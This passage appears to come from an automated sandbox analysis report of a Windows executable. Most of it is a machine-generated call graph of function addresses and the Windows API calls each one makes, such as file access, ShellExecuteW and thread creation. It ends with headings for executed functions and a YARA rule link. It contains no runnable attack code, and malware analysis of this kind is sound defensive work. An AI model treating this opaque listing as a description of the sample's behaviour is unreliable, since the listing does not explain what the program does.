11a4a1 22 API calls 98657->98659 98660 15f754 98658->98660 98661 15f7e8 98659->98661 98662 12fe0b 22 API calls 98660->98662 98661->98647 98664 11a12c __fread_nolock 98662->98664 98664->98650 98664->98652 98665 11a587 22 API calls 98665->98670 98666 11a4a1 22 API calls 98666->98670 98667 11aec9 22 API calls 98668 11a0db CharUpperBuffW 98667->98668 98699 11a673 22 API calls 98668->98699 98670->98645 98670->98650 98670->98651 98670->98652 98670->98656 98670->98664 98670->98665 98670->98666 98670->98667 98690 114573 41 API calls _wcslen 98670->98690 98700 1148c8 23 API calls 98670->98700 98701 1149bd 22 API calls __fread_nolock 98670->98701 98702 11a673 22 API calls 98670->98702 98672 15f545 98671->98672 98673 119c7e 98671->98673 98674 15f556 98672->98674 98675 116b57 22 API calls 98672->98675 98678 12fddb 22 API calls 98673->98678 98676 11a6c3 22 API calls 98674->98676 98675->98674 98677 15f560 98676->98677 98677->98677 98679 119c91 98678->98679 98680 119c9a 98679->98680 98681 119cac 98679->98681 98683 119cb3 22 API calls 98680->98683 98682 11a961 22 API calls 98681->98682 98684 119ca2 98682->98684 98683->98684 98684->98251 98686 12fe0b 22 API calls 98685->98686 98687 116295 98686->98687 98688 12fddb 22 API calls 98687->98688 98689 1162a3 98688->98689 98689->98670 98690->98670 98692 11a52b 98691->98692 98697 11a4b1 __fread_nolock 98691->98697 98694 12fe0b 22 API calls 98692->98694 98693 12fddb 22 API calls 98695 11a4b8 98693->98695 98694->98697 98696 12fddb 22 API calls 98695->98696 98698 11a4d6 98695->98698 98696->98698 98697->98693 98698->98647 98699->98670 98700->98670 98701->98670 98702->98670 98703->98657 98704->98647 98764 1154c6 98705->98764 98708 1154c6 3 API calls 98709 12fa9a 98708->98709 98709->98277 98711 12f14c 98710->98711 98712 12f188 98710->98712 98711->98712 98714 12f15b 98711->98714 98713 11a6c3 22 API calls 98712->98713 98720 17caeb 98713->98720 98715 12f170 98714->98715 98718 12f17d 98714->98718 98770 12f18e 98715->98770 98716 17cb1a 98716->98291 98777 17cbf2 26 API calls 98718->98777 98720->98716 98778 17ca89 ReadFile SetFilePointerEx 98720->98778 98779 1149bd 22 API calls __fread_nolock 98720->98779 98721 12f179 98721->98291 98725 11b578 98724->98725 98726 11b57f 98724->98726 98725->98726 98807 1362d1 39 API calls _strftime 98725->98807 98726->98266 98728 11b5c2 98728->98266 98730 116250 98729->98730 98731 11625f 98729->98731 98730->98265 98731->98730 98732 116264 CloseHandle 98731->98732 98732->98730 98734 154035 98733->98734 98735 11575c CreateFileW 98733->98735 98736 11577b 98734->98736 98737 15403b CreateFileW 98734->98737 98735->98736 98736->98289 98736->98290 98737->98736 98738 154063 98737->98738 98739 1154c6 3 API calls 98738->98739 98740 15406e 98739->98740 98740->98736 98742 1153f3 98741->98742 98755 1153f0 ISource 98741->98755 98743 1154c6 3 API calls 98742->98743 98742->98755 98744 115410 98743->98744 98745 11541d 98744->98745 98746 153f4b 98744->98746 98747 12fe0b 22 API calls 98745->98747 98748 12fa5b 3 API calls 98746->98748 98749 115429 98747->98749 98748->98755 98750 115722 22 API calls 98749->98750 98751 115433 98750->98751 98752 119a40 2 API calls 98751->98752 98753 11543f 98752->98753 98754 1154c6 3 API calls 98753->98754 98754->98755 98755->98297 98756->98300 98757->98302 98758->98303 98759->98307 98760->98259 98761->98259 98762->98288 98763->98299 98769 1154dd 98764->98769 98765 115564 SetFilePointerEx SetFilePointerEx 98767 115530 98765->98767 98766 153f9c SetFilePointerEx 98767->98708 98768 153f8b 98768->98766 98769->98765 98769->98766 98769->98767 98769->98768 98780 12f1d8 98770->98780 98776 12f1c1 98776->98721 98777->98721 98778->98720 98779->98720 98781 12fe0b 22 API calls 98780->98781 98782 12f1ef 98781->98782 98783 12fddb 22 API calls 98782->98783 98784 12f1a6 98783->98784 98785 1197b6 98784->98785 98792 119a1e 98785->98792 98787 1197c7 98789 1197fc 98787->98789 98799 119a40 98787->98799 98805 119b01 22 API calls __fread_nolock 98787->98805 98789->98776 98791 116e14 24 API calls 98789->98791 98791->98776 98793 15f378 98792->98793 98794 119a2f 98792->98794 98795 12fddb 22 API calls 98793->98795 98794->98787 98796 15f382 98795->98796 98797 12fe0b 22 API calls 98796->98797 98798 15f397 98797->98798 98800 119abb 98799->98800 98804 119a4e 98799->98804 98806 12e40f SetFilePointerEx 98800->98806 98802 119a7c 98802->98787 98803 119a8c ReadFile 98803->98802 98803->98804 98804->98802 98804->98803 98805->98787 98806->98804 98807->98728 98809 17d4d5 98808->98809 98810 17dbdc GetFileAttributesW 98808->98810 98809->98184 98810->98809 98811 17dbe8 FindFirstFileW 98810->98811 98811->98809 98812 17dbf9 FindClose 98811->98812 98812->98809 98814 11a961 22 API calls 98813->98814 98815 115275 98814->98815 98816 11a961 22 API calls 98815->98816 98817 11527d 98816->98817 98818 11a961 22 API calls 98817->98818 98819 115285 98818->98819 98820 11a961 22 API calls 98819->98820 98821 11528d 98820->98821 98822 153df5 98821->98822 98823 1152c1 98821->98823 98824 11a8c7 22 API calls 98822->98824 98825 116d25 22 API calls 98823->98825 98827 153dfe 98824->98827 98826 1152cf 98825->98826 98828 1193b2 22 API calls 98826->98828 98829 11a6c3 22 API calls 98827->98829 98830 1152d9 98828->98830 98831 115304 98829->98831 98830->98831 98832 116d25 22 API calls 98830->98832 98833 115325 98831->98833 98847 115349 98831->98847 98851 153e20 98831->98851 98835 1152fa 98832->98835 98839 114c6d 22 API calls 98833->98839 98833->98847 98834 116d25 22 API calls 98836 11535a 98834->98836 98837 1193b2 22 API calls 98835->98837 98838 115370 98836->98838 98842 11a8c7 22 API calls 98836->98842 98837->98831 98843 115384 98838->98843 98845 11a8c7 22 API calls 98838->98845 98840 115332 98839->98840 98844 116d25 22 API calls 98840->98844 98840->98847 98841 116b57 22 API calls 98852 153ee0 98841->98852 98842->98838 98846 11a8c7 22 API calls 98843->98846 98848 11538f 98843->98848 98844->98847 98845->98843 98846->98848 98847->98834 98849 11a8c7 22 API calls 98848->98849 98853 11539a 98848->98853 98849->98853 98850 114c6d 22 API calls 98850->98852 98851->98841 98852->98847 98852->98850 98975 1149bd 22 API calls __fread_nolock 98852->98975 98853->98364 98856 116362 98855->98856 98857 154a51 98855->98857 98976 116373 98856->98976 98986 114a88 22 API calls __fread_nolock 98857->98986 98860 11636e 98860->98377 98861 154a5b 98862 154a67 98861->98862 98863 11a8c7 22 API calls 98861->98863 98863->98862 98865 17d7d8 98864->98865 98866 17d7f3 98865->98866 98867 17d7dd 98865->98867 98868 11a961 22 API calls 98866->98868 98870 11a8c7 22 API calls 98867->98870 98917 17d7ee 98867->98917 98869 17d7fb 98868->98869 98871 11a961 22 API calls 98869->98871 98870->98917 98872 17d803 98871->98872 98873 11a961 22 API calls 98872->98873 98874 17d80e 98873->98874 98875 11a961 22 API calls 98874->98875 98876 17d816 98875->98876 98877 11a961 22 API calls 98876->98877 98878 17d81e 98877->98878 98879 11a961 22 API calls 98878->98879 98880 17d826 98879->98880 98881 11a961 22 API calls 98880->98881 98882 17d82e 98881->98882 98883 11a961 22 API calls 98882->98883 98884 17d836 98883->98884 98885 11525f 22 API calls 98884->98885 98886 17d84d 98885->98886 98887 11525f 22 API calls 98886->98887 98888 17d866 98887->98888 98889 114c6d 22 API calls 98888->98889 98890 17d872 98889->98890 98891 17d885 98890->98891 98892 1193b2 22 API calls 98890->98892 98893 114c6d 22 API calls 98891->98893 98892->98891 98894 17d88e 98893->98894 98895 17d89e 98894->98895 98896 1193b2 22 API calls 98894->98896 98897 17d8b0 98895->98897 98899 11a8c7 22 API calls 98895->98899 98896->98895 98898 116350 22 API calls 98897->98898 98900 17d8bb 98898->98900 98899->98897 98987 17d978 22 API calls 98900->98987 98902 17d8ca 98988 17d978 22 API calls 98902->98988 98904 17d8dd 98905 114c6d 22 API calls 98904->98905 98906 17d8e7 98905->98906 98907 17d8fe 98906->98907 98908 17d8ec 98906->98908 98910 114c6d 22 API calls 98907->98910 98909 1133c6 22 API calls 98908->98909 98911 17d8f9 98909->98911 98912 17d907 98910->98912 98914 116350 22 API calls 98911->98914 98913 17d925 98912->98913 98916 1133c6 22 API calls 98912->98916 98914->98913 98916->98911 98917->98386 98919 182954 __wsopen_s 98918->98919 98920 12fe0b 22 API calls 98919->98920 98921 182971 98920->98921 98922 115722 22 API calls 98921->98922 98923 18297b 98922->98923 98989 18274e 98923->98989 98925 182986 98926 11511f 64 API calls 98925->98926 98927 18299b 98926->98927 98928 182a6c 98927->98928 98929 1829bf 98927->98929 98999 182e66 75 API calls 98928->98999 98996 182e66 75 API calls 98929->98996 98932 1829c4 98939 182a75 ISource 98932->98939 98997 13d583 26 API calls 98932->98997 98934 1150f5 40 API calls 98935 182a91 98934->98935 98936 1150f5 40 API calls 98935->98936 98938 182aa1 98936->98938 98937 1829ed 98998 13d583 26 API calls 98937->98998 98940 1150f5 40 API calls 98938->98940 98939->98392 98942 182abc 98940->98942 98943 1150f5 40 API calls 98942->98943 98944 182acc 98943->98944 98945 1150f5 40 API calls 98944->98945 98947 182ae7 98945->98947 98946 182a38 98946->98934 98946->98939 98948 1150f5 40 API calls 98947->98948 98949 182af7 98948->98949 98950 1150f5 40 API calls 98949->98950 98951 182b07 98950->98951 98973->98355 98974->98367 98975->98852 98978 116382 98976->98978 98983 1163b6 __fread_nolock 98976->98983 98977 154a82 98980 12fddb 22 API calls 98977->98980 98978->98977 98979 1163a9 98978->98979 98978->98983 98981 11a587 22 API calls 98979->98981 98982 154a91 98980->98982 98981->98983 98984 12fe0b 22 API calls 98982->98984 98983->98860 98985 154ac5 __fread_nolock 98984->98985 98986->98861 98987->98902 98988->98904 99000 13e4e8 98989->99000 98991 18275d 98991->98925 98996->98932 98997->98937 98998->98946 98999->98946 99003 13e469 99000->99003 99002 13e505 99002->98991 99004 13e478 99003->99004 99005 13e48c 99003->99005 99011 13f2d9 20 API calls __dosmaperr 99004->99011 99010 13e488 __alldvrm 99005->99010 99013 14333f 11 API calls 2 library calls 99005->99013 99007 13e47d 99012 1427ec 26 API calls __cftof 99007->99012 99010->99002 99011->99007 99012->99010 99013->99010 99015 11a961 22 API calls 99014->99015 99016 1792de 99015->99016 99017 116270 22 API calls 99016->99017 99018 1792f2 99017->99018 99019 178e54 41 API calls 99018->99019 99024 179314 99018->99024 99020 17930e 99019->99020 99022 116d25 22 API calls 99020->99022 99020->99024 99021 178e54 41 API calls 99021->99024 99022->99024 99023 116d25 22 API calls 99023->99024 99024->99021 99024->99023 99025 1793b3 99024->99025 99026 116350 22 API calls 99024->99026 99029 179397 99024->99029 99027 11a8c7 22 API calls 99025->99027 99028 1793c2 99025->99028 99026->99024 99027->99028 99028->98430 99030 116d25 22 API calls 99029->99030 99031 1793a7 99030->99031 99032 116350 22 API calls 99031->99032 99032->99025 99033->98428 99034->98476 99035->98481 99036->98478 99037->98486 99038->98486 99039 152ba5 99040 112b25 99039->99040 99041 152baf 99039->99041 99067 112b83 7 API calls 99040->99067 99043 113a5a 24 API calls 99041->99043 99045 152bb8 99043->99045 99047 119cb3 22 API calls 99045->99047 99049 152bc6 99047->99049 99048 112b2f 99058 112b44 99048->99058 99071 113837 49 API calls ___scrt_fastfail 99048->99071 99050 152bf5 99049->99050 99051 152bce 99049->99051 99052 1133c6 22 API calls 99050->99052 99054 1133c6 22 API calls 99051->99054 99055 152bf1 GetForegroundWindow ShellExecuteW 99052->99055 99056 152bd9 99054->99056 99061 152c26 99055->99061 99060 116350 22 API calls 99056->99060 99059 112b5f 99058->99059 99072 1130f2 Shell_NotifyIconW ___scrt_fastfail 99058->99072 99064 112b66 SetCurrentDirectoryW 99059->99064 99063 152be7 99060->99063 99061->99059 99065 1133c6 22 API calls 99063->99065 99066 112b7a 99064->99066 99065->99055 99073 112cd4 7 API calls 99067->99073 99069 112b2a 99070 112c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99069->99070 99070->99048 99071->99058 99072->99059 99073->99069 99074 112de3 99075 112df0 __wsopen_s 99074->99075 99076 112e09 99075->99076 99077 152c2b ___scrt_fastfail 99075->99077 99078 113aa2 23 API calls 99076->99078 99079 152c47 GetOpenFileNameW 99077->99079 99080 112e12 99078->99080 99081 152c96 99079->99081 99090 112da5 99080->99090 99083 116b57 22 API calls 99081->99083 99085 152cab 99083->99085 99085->99085 99087 112e27 99108 1144a8 99087->99108 99091 151f50 __wsopen_s 99090->99091 99092 112db2 GetLongPathNameW 99091->99092 99093 116b57 22 API calls 99092->99093 99094 112dda 99093->99094 99095 113598 99094->99095 99096 11a961 22 API calls 99095->99096 99097 1135aa 99096->99097 99098 113aa2 23 API calls 99097->99098 99099 1135b5 99098->99099 99100 1135c0 99099->99100 99101 1532eb 99099->99101 99102 11515f 22 API calls 99100->99102 99106 15330d 99101->99106 99143 12ce60 41 API calls 99101->99143 99104 1135cc 99102->99104 99137 1135f3 99104->99137 99107 1135df 99107->99087 99109 114ecb 94 API calls 99108->99109 99110 1144cd 99109->99110 99111 153833 99110->99111 99113 114ecb 94 API calls 99110->99113 99112 182cf9 80 API calls 99111->99112 99114 153848 99112->99114 99115 1144e1 99113->99115 99116 15384c 99114->99116 99117 153869 99114->99117 99115->99111 99118 1144e9 99115->99118 99119 114f39 68 API calls 99116->99119 99120 12fe0b 22 API calls 99117->99120 99121 153854 99118->99121 99122 1144f5 99118->99122 99119->99121 99134 1538ae 99120->99134 99151 17da5a 82 API calls 99121->99151 99150 11940c 136 API calls 2 library calls 99122->99150 99125 112e31 99126 153862 99126->99117 99127 114f39 68 API calls 99130 153a5f 99127->99130 99128 11a4a1 22 API calls 99128->99134 99130->99127 99155 17989b 82 API calls __wsopen_s 99130->99155 99133 119cb3 22 API calls 99133->99134 99134->99128 99134->99130 99134->99133 99144 113ff7 99134->99144 99152 17967e 22 API calls __fread_nolock 99134->99152 99153 1795ad 42 API calls _wcslen 99134->99153 99154 180b5a 22 API calls 99134->99154 99138 113605 99137->99138 99142 113624 __fread_nolock 99137->99142 99140 12fe0b 22 API calls 99138->99140 99139 12fddb 22 API calls 99141 11363b 99139->99141 99140->99142 99141->99107 99142->99139 99143->99101 99145 11400a 99144->99145 99148 1140ae 99144->99148 99147 12fe0b 22 API calls 99145->99147 99149 11403c 99145->99149 99146 12fddb 22 API calls 99146->99149 99147->99149 99148->99134 99149->99146 99149->99148 99150->99125 99151->99126 99152->99134 99153->99134 99154->99134 99155->99130 99156 11dee5 99159 11b710 99156->99159 99160 11b72b 99159->99160 99161 160146 99160->99161 99162 1600f8 99160->99162 99189 11b750 99160->99189 99201 1958a2 256 API calls 2 library calls 99161->99201 99165 160102 99162->99165 99168 16010f 99162->99168 99162->99189 99199 195d33 256 API calls 99165->99199 99180 11ba20 99168->99180 99200 1961d0 256 API calls 2 library calls 99168->99200 99172 1603d9 99172->99172 99174 11ba4e 99176 160322 99204 195c0c 82 API calls 99176->99204 99180->99174 99205 18359c 82 API calls __wsopen_s 99180->99205 99184 11bbe0 40 API calls 99184->99189 99185 12d336 40 API calls 99185->99189 99186 11ec40 256 API calls 99186->99189 99187 11a8c7 22 API calls 99187->99189 99189->99174 99189->99176 99189->99180 99189->99184 99189->99185 99189->99186 99189->99187 99190 11a81b 41 API calls 99189->99190 99191 12d2f0 40 API calls 99189->99191 99192 12a01b 256 API calls 99189->99192 99193 130242 5 API calls __Init_thread_wait 99189->99193 99194 12edcd 22 API calls 99189->99194 99195 1300a3 29 API calls __onexit 99189->99195 99196 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99189->99196 99197 12ee53 82 API calls 99189->99197 99198 12e5ca 256 API calls 99189->99198 99202 11aceb 23 API calls ISource 99189->99202 99203 16f6bf 23 API calls 99189->99203 99190->99189 99191->99189 99192->99189 99193->99189 99194->99189 99195->99189 99196->99189 99197->99189 99198->99189 99199->99168 99200->99180 99201->99189 99202->99189 99203->99189 99204->99180 99205->99172 99206 111044 99211 1110f3 99206->99211 99208 11104a 99247 1300a3 29 API calls __onexit 99208->99247 99210 111054 99248 111398 99211->99248 99215 11116a 99216 11a961 22 API calls 99215->99216 99217 111174 99216->99217 99218 11a961 22 API calls 99217->99218 99219 11117e 99218->99219 99220 11a961 22 API calls 99219->99220 99221 111188 99220->99221 99222 11a961 22 API calls 99221->99222 99223 1111c6 99222->99223 99224 11a961 22 API calls 99223->99224 99225 111292 99224->99225 99258 11171c 99225->99258 99229 1112c4 99230 11a961 22 API calls 99229->99230 99231 1112ce 99230->99231 99232 121940 9 API calls 99231->99232 99233 1112f9 99232->99233 99279 111aab 99233->99279 99235 111315 99236 111325 GetStdHandle 99235->99236 99237 152485 99236->99237 99240 11137a 99236->99240 99238 15248e 99237->99238 99237->99240 99239 12fddb 22 API calls 99238->99239 99241 152495 99239->99241 99242 111387 OleInitialize 99240->99242 99286 18011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99241->99286 99242->99208 99244 15249e 99287 180944 CreateThread 99244->99287 99246 1524aa CloseHandle 99246->99240 99247->99210 99288 1113f1 99248->99288 99251 1113f1 22 API calls 99252 1113d0 99251->99252 99253 11a961 22 API calls 99252->99253 99254 1113dc 99253->99254 99255 116b57 22 API calls 99254->99255 99256 111129 99255->99256 99257 111bc3 6 API calls 99256->99257 99257->99215 99259 11a961 22 API calls 99258->99259 99260 11172c 99259->99260 99261 11a961 22 API calls 99260->99261 99262 111734 99261->99262 99263 11a961 22 API calls 99262->99263 99264 11174f 99263->99264 99265 12fddb 22 API calls 99264->99265 99266 11129c 99265->99266 99267 111b4a 99266->99267 99268 111b58 99267->99268 99269 11a961 22 API calls 99268->99269 99270 111b63 99269->99270 99271 11a961 22 API calls 99270->99271 99272 111b6e 99271->99272 99273 11a961 22 API calls 99272->99273 99274 111b79 99273->99274 99275 11a961 22 API calls 99274->99275 99276 111b84 99275->99276 99277 12fddb 22 API calls 99276->99277 99278 111b96 RegisterWindowMessageW 99277->99278 99278->99229 99280 15272d 99279->99280 99281 111abb 99279->99281 99295 183209 23 API calls 99280->99295 99282 12fddb 22 API calls 99281->99282 99284 111ac3 99282->99284 99284->99235 99285 152738 99286->99244 99287->99246 99296 18092a 28 API calls 99287->99296 99289 11a961 22 API calls 99288->99289 99290 1113fc 99289->99290 99291 11a961 22 API calls 99290->99291 99292 111404 99291->99292 99293 11a961 22 API calls 99292->99293 99294 1113c6 99293->99294 99294->99251 99295->99285 99297 148402 99302 1481be 99297->99302 99300 14842a 99308 1481ef try_get_first_available_module 99302->99308 99303 148338 99307 148343 99303->99307 99320 13f2d9 20 API calls __dosmaperr 99303->99320 99305 1483ee 99321 1427ec 26 API calls __cftof 99305->99321 99307->99300 99314 150984 99307->99314 99308->99303 99317 138e0b 40 API calls 2 library calls 99308->99317 99310 14838c 99310->99303 99318 138e0b 40 API calls 2 library calls 99310->99318 99312 1483ab 99312->99303 99319 138e0b 40 API calls 2 library calls 99312->99319 99322 150081 99314->99322 99316 15099f 99316->99300 99317->99310 99318->99312 99319->99303 99320->99305 99321->99307 99324 15008d ___scrt_is_nonwritable_in_current_image 99322->99324 99323 15009b 99380 13f2d9 20 API calls __dosmaperr 99323->99380 99324->99323 99326 1500d4 99324->99326 99333 15065b 99326->99333 99327 1500a0 99381 1427ec 26 API calls __cftof 99327->99381 99332 1500aa __fread_nolock 99332->99316 99383 15042f 99333->99383 99336 1506a6 99401 145221 99336->99401 99337 15068d 99415 13f2c6 20 API calls __dosmaperr 99337->99415 99340 1506ab 99342 1506b4 99340->99342 99343 1506cb 99340->99343 99341 150692 99416 13f2d9 20 API calls __dosmaperr 99341->99416 99417 13f2c6 20 API calls __dosmaperr 99342->99417 99414 15039a CreateFileW 99343->99414 99347 1506b9 99418 13f2d9 20 API calls __dosmaperr 99347->99418 99348 1500f8 99382 150121 LeaveCriticalSection __wsopen_s 99348->99382 99350 150781 GetFileType 99351 1507d3 99350->99351 99352 15078c GetLastError 99350->99352 99423 14516a 21 API calls 3 library calls 99351->99423 99421 13f2a3 20 API calls 2 library calls 99352->99421 99353 150756 GetLastError 99420 13f2a3 20 API calls 2 library calls 99353->99420 99356 150704 99356->99350 99356->99353 99419 15039a CreateFileW 99356->99419 99357 15079a CloseHandle 99357->99341 99359 1507c3 99357->99359 99422 13f2d9 20 API calls __dosmaperr 99359->99422 99361 150749 99361->99350 99361->99353 99363 1507f4 99364 150840 99363->99364 99424 1505ab 72 API calls 4 library calls 99363->99424 99369 15086d 99364->99369 99425 15014d 72 API calls 4 library calls 99364->99425 99365 1507c8 99365->99341 99368 150866 99368->99369 99370 15087e 99368->99370 99371 1486ae __wsopen_s 29 API calls 99369->99371 99370->99348 99372 1508fc CloseHandle 99370->99372 99371->99348 99426 15039a CreateFileW 99372->99426 99374 150927 99375 150931 GetLastError 99374->99375 99376 15095d 99374->99376 99427 13f2a3 20 API calls 2 library calls 99375->99427 99376->99348 99378 15093d 99428 145333 21 API calls 3 library calls 99378->99428 99380->99327 99381->99332 99382->99332 99384 15046a 99383->99384 99385 150450 99383->99385 99429 1503bf 99384->99429 99385->99384 99436 13f2d9 20 API calls __dosmaperr 99385->99436 99388 15045f 99437 1427ec 26 API calls __cftof 99388->99437 99390 1504a2 99391 1504d1 99390->99391 99438 13f2d9 20 API calls __dosmaperr 99390->99438 99392 150524 99391->99392 99440 13d70d 26 API calls 2 library calls 99391->99440 99392->99336 99392->99337 99395 15051f 99395->99392 99397 15059e 99395->99397 99396 1504c6 99439 1427ec 26 API calls __cftof 99396->99439 99441 1427fc 11 API calls _abort 99397->99441 99400 1505aa 99402 14522d ___scrt_is_nonwritable_in_current_image 99401->99402 99444 142f5e EnterCriticalSection 99402->99444 99405 145234 99406 145259 99405->99406 99410 1452c7 EnterCriticalSection 99405->99410 99413 14527b 99405->99413 99448 145000 21 API calls 3 library calls 99406->99448 99407 1452a4 __fread_nolock 99407->99340 99409 14525e 99409->99413 99449 145147 EnterCriticalSection 99409->99449 99412 1452d4 LeaveCriticalSection 99410->99412 99410->99413 99412->99405 99445 14532a 99413->99445 99414->99356 99415->99341 99416->99348 99417->99347 99418->99341 99419->99361 99420->99341 99421->99357 99422->99365 99423->99363 99424->99364 99425->99368 99426->99374 99427->99378 99428->99376 99430 1503d7 99429->99430 99431 1503f2 99430->99431 99442 13f2d9 20 API calls __dosmaperr 99430->99442 99431->99390 99433 150416 99443 1427ec 26 API calls __cftof 99433->99443 99435 150421 99435->99390 99436->99388 99437->99384 99438->99396 99439->99391 99440->99395 99441->99400 99442->99433 99443->99435 99444->99405 99450 142fa6 LeaveCriticalSection 99445->99450 99447 145331 99447->99407 99448->99409 99449->99413 99450->99447 99451 162a00 99465 11d7b0 ISource 99451->99465 99452 11db11 PeekMessageW 99452->99465 99453 11d807 GetInputState 99453->99452 99453->99465 99455 161cbe TranslateAcceleratorW 99455->99465 99456 11da04 timeGetTime 99456->99465 99457 11db73 TranslateMessage DispatchMessageW 99458 11db8f PeekMessageW 99457->99458 99458->99465 99459 11dbaf Sleep 99481 11dbc0 99459->99481 99460 162b74 Sleep 99460->99481 99461 12e551 timeGetTime 99461->99481 99462 161dda timeGetTime 99572 12e300 23 API calls 99462->99572 99465->99452 99465->99453 99465->99455 99465->99456 99465->99457 99465->99458 99465->99459 99465->99460 99465->99462 99467 11d9d5 99465->99467 99478 11ec40 256 API calls 99465->99478 99479 121310 256 API calls 99465->99479 99483 11dd50 99465->99483 99490 11dfd0 99465->99490 99513 11bf40 99465->99513 99571 12edf6 IsDialogMessageW GetClassLongW 99465->99571 99573 183a2a 23 API calls 99465->99573 99574 18359c 82 API calls __wsopen_s 99465->99574 99466 162c0b GetExitCodeProcess 99469 162c37 CloseHandle 99466->99469 99470 162c21 WaitForSingleObject 99466->99470 99469->99481 99470->99465 99470->99469 99471 162a31 99471->99467 99472 1a29bf GetForegroundWindow 99472->99481 99473 162ca9 Sleep 99473->99465 99478->99465 99479->99465 99481->99461 99481->99465 99481->99466 99481->99467 99481->99471 99481->99472 99481->99473 99575 195658 23 API calls 99481->99575 99576 17e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99481->99576 99577 17d4dc 47 API calls 99481->99577 99484 11dd83 99483->99484 99485 11dd6f 99483->99485 99579 18359c 82 API calls __wsopen_s 99484->99579 99578 11d260 256 API calls 2 library calls 99485->99578 99488 11dd7a 99488->99465 99489 162f75 99489->99489 99491 11e010 99490->99491 99506 11e0dc ISource 99491->99506 99582 130242 5 API calls __Init_thread_wait 99491->99582 99492 11ec40 256 API calls 99492->99506 99495 162fca 99498 11a961 22 API calls 99495->99498 99495->99506 99496 11e3e1 99496->99465 99497 11a961 22 API calls 99497->99506 99501 162fe4 99498->99501 99583 1300a3 29 API calls __onexit 99501->99583 99504 18359c 82 API calls 99504->99506 99505 162fee 99584 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99505->99584 99506->99492 99506->99496 99506->99497 99506->99504 99509 11a8c7 22 API calls 99506->99509 99510 1204f0 22 API calls 99506->99510 99580 11a81b 41 API calls 99506->99580 99581 12a308 256 API calls 99506->99581 99585 130242 5 API calls __Init_thread_wait 99506->99585 99586 1300a3 29 API calls __onexit 99506->99586 99587 1301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99506->99587 99588 1947d4 256 API calls 99506->99588 99589 1968c1 256 API calls 99506->99589 99509->99506 99510->99506 99590 11adf0 99513->99590 99515 11bf9d 99516 1604b6 99515->99516 99517 11bfa9 99515->99517 99609 18359c 82 API calls __wsopen_s 99516->99609 99519 1604c6 99517->99519 99520 11c01e 99517->99520 99610 18359c 82 API calls __wsopen_s 99519->99610 99595 11ac91 99520->99595 99524 177120 22 API calls 99568 11c039 ISource __fread_nolock 99524->99568 99525 11c7da 99528 12fe0b 22 API calls 99525->99528 99533 11c808 __fread_nolock 99528->99533 99530 1604f5 99534 16055a 99530->99534 99611 12d217 256 API calls 99530->99611 99535 12fe0b 22 API calls 99533->99535 99556 11c603 99534->99556 99612 18359c 82 API calls __wsopen_s 99534->99612 99569 11c350 ISource __fread_nolock 99535->99569 99536 11af8a 22 API calls 99536->99568 99537 16091a 99622 183209 23 API calls 99537->99622 99540 11ec40 256 API calls 99540->99568 99541 1608a5 99542 11ec40 256 API calls 99541->99542 99544 1608cf 99542->99544 99544->99556 99620 11a81b 41 API calls 99544->99620 99545 160591 99613 18359c 82 API calls __wsopen_s 99545->99613 99546 1608f6 99621 18359c 82 API calls __wsopen_s 99546->99621 99551 11c237 99553 11c253 99551->99553 99555 11a8c7 22 API calls 99551->99555 99557 160976 99553->99557 99562 11c297 ISource 99553->99562 99554 12fe0b 22 API calls 99554->99568 99555->99553 99556->99465 99623 11aceb 23 API calls ISource 99557->99623 99559 12fddb 22 API calls 99559->99568 99561 1609bf 99561->99556 99624 18359c 82 API calls __wsopen_s 99561->99624 99562->99561 99606 11aceb 23 API calls ISource 99562->99606 99564 11c335 99564->99561 99565 11c342 99564->99565 99607 11a704 22 API calls ISource 99565->99607 99566 11bbe0 40 API calls 99566->99568 99568->99524 99568->99525 99568->99530 99568->99533 99568->99534 99568->99536 99568->99537 99568->99540 99568->99541 99568->99545 99568->99546 99568->99551 99568->99554 99568->99556 99568->99559 99568->99561 99568->99566 99599 11ad81 99568->99599 99614 177099 22 API calls __fread_nolock 99568->99614 99615 195745 54 API calls _wcslen 99568->99615 99616 12aa42 22 API calls ISource 99568->99616 99617 17f05c 40 API calls 99568->99617 99618 11a993 41 API calls 99568->99618 99619 11aceb 23 API calls ISource 99568->99619 99570 11c3ac 99569->99570 99608 12ce17 22 API calls ISource 99569->99608 99570->99465 99571->99465 99572->99465 99573->99465 99574->99465 99575->99481 99576->99481 99577->99481 99578->99488 99579->99489 99580->99506 99581->99506 99582->99495 99583->99505 99584->99506 99585->99506 99586->99506 99587->99506 99588->99506 99589->99506 99591 11ae01 99590->99591 99594 11ae1c ISource 99590->99594 99592 11aec9 22 API calls 99591->99592 99593 11ae09 CharUpperBuffW 99592->99593 99593->99594 99594->99515 99596 11acae 99595->99596 99597 11acd1 99596->99597 99625 18359c 82 API calls __wsopen_s 99596->99625 99597->99568 99600 11ad92 99599->99600 99601 15fadb 99599->99601 99602 12fddb 22 API calls 99600->99602 99603 11ad99 99602->99603 99626 11adcd 99603->99626 99606->99564 99607->99569 99608->99569 99609->99519 99610->99556 99611->99534 99612->99556 99613->99556 99614->99568 99615->99568 99616->99568 99617->99568 99618->99568 99619->99568 99620->99546 99621->99556 99622->99551 99623->99561 99624->99556 99625->99597 99629 11addd 99626->99629 99627 11adb6 99627->99568 99628 12fddb 22 API calls 99628->99629 99629->99627 99629->99628 99630 11a961 22 API calls 99629->99630 99631 11a8c7 22 API calls 99629->99631 99632 11adcd 22 API calls 99629->99632 99630->99629 99631->99629 99632->99629 99633 111cad SystemParametersInfoW

                Executed Functions

                Function 001142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
